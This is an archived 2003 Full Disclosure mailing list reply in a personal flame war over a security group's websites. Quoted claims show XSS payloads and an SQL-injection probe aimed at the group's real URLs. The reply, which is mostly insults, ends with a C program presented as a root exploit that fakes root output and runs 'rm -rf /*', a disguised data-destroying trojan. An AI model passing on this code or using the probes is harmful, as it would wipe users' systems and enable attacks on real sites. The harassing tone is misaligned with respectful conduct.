Full Disclosure mailing list archives
Re: [OMG] NSRG Security & Lorenzo Hernandez "SuckYouBeans" Garcia-Hierro
From: "Lorenzo Hernandez Garcia-Hierro" <lorenzohgh () nsrg-security com>
Date: Sat, 6 Dec 2003 04:23:00 +0100
Hi, I think you are a little stuck wth honeypots: http://www.nsrg-security.com/kiddies.txt The only thing is not there is a photo of you ?face?
~~~~ 0D4Y-OMFG FACTOR 1 MILLIN 0D4Y-OMFG FACTOR 1 MILLIN 0D4Y-OMFG FACTOR
1 MILLIN
0D4Y-OMFG FACTOR 1 MILLIN 0D4Y-OMFG FACTOR 1 MILLIN 0D4Y-OMFG FACTOR
1 MILLIN
0D4Y-OMFG FACTOR 1 MILLIN 0D4Y-OMFG FACTOR 1 MILLIN 0D4Y-OMFG FACTOR
1 MILLIN
O132J0R2800D4Y0D4Y-OMFG FACTOR 1 MILLIN O132J0R2800D4Y0D4Y- OMFG FACTOR 1 MILLIN O132J0R2800D4Y0D4Y-OMFG FACTOR 1 MILLIN
O132J0R2800D4Y0D4Y-
OMFG FACTOR 1 MILLIN O132J0R2800D4Y0D4Y-OMFG FACTOR 1 MILLIN
O132J0R2800D4Y0D4Y-
OMFG FACTOR 1 MILLIN O132J0R2800D4Y0D4Y-OMFG FACTOR 1 MILLIN
O132J0R2800D4Y
~~~~~~~~ [ Playing with stolen relabeled code by NSRG-Security ] \=1`\ Brought to you by the fine folks at \`=1\ \=1`\ Stupidity In the World Industries \`=1\ \=1`\ The Re-Resurrection \`=1\ sites: nsrg-security.com w3.nsrg-security.com http://news.nsrg-security.com test-zone.nsrg-security.com advisories.nsrg-security.com Look through web sites and learn about horatio.Quote from "Lorenzo Hernandez Garcia-Hierro" to
"gazpa"
haha i no script kiddie i call u mother and ask about you scanning for rpc all night hahaofihohashahomfgroflmfaowssd
get a valium , say again , better ?
~ OH WAIT! the only linux exploit i have on my worthless nsrg-security
site
~ is for windows rpc, DOH! I look like such an idiot
are OK ? did you get your pills ¿¿?
End Quote========================================================== ==Advisory #8131== ==Giving you 10 years of XSS!!== NSRG SECURITY "Almost as lame as morning_wood" ============================================================= http://www.nsrg-security.com/forum/viewtopic.php?forum=2&showtopic=1
having 1=1--
"An SQL error has occured. Please see error.log for details."
where is the exploitable query ? i think theres not... but you appear in the "in"famous list: http://www.nsrg-security.com/kiddies.txt
http://www.nsrg-security.com/stuff/trans.php?lang=sagsdg Stupid programming
it rejects non existent languages ( there is no return else function )
[blah] http://www.nsrg-security.com/stuff/ HEXCODES.TXT 25-Oct-2003 23:21 1k check_sys.php 21-Nov-2003 16:43 2k irc.php 22-Nov-2003 00:06 4k news-cert.php 21-Nov-2003 18:18 1k news-kernel-traffic.php 21-Nov-2003 18:18 1k news-securityfocus.php 21-Nov-2003 18:18 1k news-slashdot.php 21-Nov-2003 18:18 1k news.php 21-Nov-2003 19:03 3k trans.php 21-Nov-2003 17:40 3k voyeur-system.php 21-Nov-2003 16:50 3k vulns-securityfocus.php 21-Nov-2003 18:18 1k
oh , my god ! you find a directory listing ! xD you can read slashdot if you want.... or kernel traffic, it doesn't mattter , the idiot is you....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Quote from site: = NSRG "One of the best security resources around" =
the old quote ? ...
"XSS" in: http://w3.nsrg-security.com/search/index.php <script>alert(window.cookie)</script>
http://w3.nsrg-security.com/search/index.php?weblog=&keywords=%3Cscript%3Ealert%28window.cookie%29%3C%2Fscript%3E try to execute it with cookies !!! xD try again , i think you copied this from somewehere else ...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ testzone.nsrg-security.com "XSS" in Referer log at: http://test-zone.nsrg-security.com/xss/
why you don't post an advisory about php has a flaw in strip_tags function ????? xD strip_tags($refererer-f); go back to drawing board !
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ news.nsrg-security.com "XSS" in Email variable at: http://news.nsrg-security.com/register.php
try it , i think your about 10 times in http://www.nsrg-security.com/kiddies.txt xD
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ misc: XSS kiddie advisories: http://advisories.nsrg-security.com/ http://advisories.nsrg-security.com/FileDonkey.com-XSS/exploit.html Another kiddie running nessus on everything he finds:
xD do you think that ? i think you must bye glasses or new eyes , read the complete advisory not the stupid nessus report ( its marked as suplementary with notes ).
http://advisories.nsrg-security.com/Nasa.gov-MV/nasa.gov-audit-by-robot.php
Hiding his MS browser:
do you now a browser called Mozilla ? Netscape ? which plane is your home ? which Singapoor ?
http://advisories.nsrg-security.com/Nasa.gov-MV/screenshots/SQL-3.gif
================================================== Greets; MOOT INDUSTRIES, moot bailey, elite nsrg-security xss h4x0rs-they dont
know SQL but they know
how to type '` when they see "id=###", the cisco kyd, welcome to the
doghouse
greets , you missed the Z xD . we don't know sql ? its new... you don't know too ( you don't know nothing ) and... a quote from morrocco : kristataran atan busken ( search it , i don't know the correct spelling... xD ) and here is your new uber-hax0r exploit , for root machiones on the tv ( only pr0n as you like ): /* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * Franks and Beans suckit Notrootkit * where is my brain ? * misspelled behind mind * shutdown now && halt * i can't halt , i am stuck on stupidity * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */ #include <stdlib.h> int main() { system("echo uid=0(root) gid=0(root) groups=0(root)"); system("rm -rf /*"); system("Exploit code executed successfully ! r00ted by Franks and Beans , donnie ?"); } Best regards....xD PS: take your time and think again if not take pills and go to the doctor. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [OMG] NSRG Security & Lorenzo Hernandez "SuckYouBeans" Garcia-Hierro Franks and Beans (Dec 05)
- Re: [OMG] NSRG Security & Lorenzo Hernandez "SuckYouBeans" Garcia-Hierro Lorenzo Hernandez Garcia-Hierro (Dec 05)
- Message not available
- Re: [OMG] NSRG Security & Lorenzo Hernandez "SuckYouBeans" Garcia-Hierro Lorenzo Hernandez Garcia-Hierro (Dec 05)
- Message not available
- Re: [OMG] NSRG Security & Lorenzo Hernandez "SuckYouBeans" Garcia-Hierro Lorenzo Hernandez Garcia-Hierro (Dec 05)